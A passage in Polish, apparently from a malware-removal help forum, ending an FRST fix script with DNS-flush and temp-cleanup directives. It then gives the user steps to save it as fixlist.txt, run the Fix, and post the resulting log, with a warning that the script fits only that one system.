/flushdns EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go i wypowiedz się czy jest jakaś zmiana.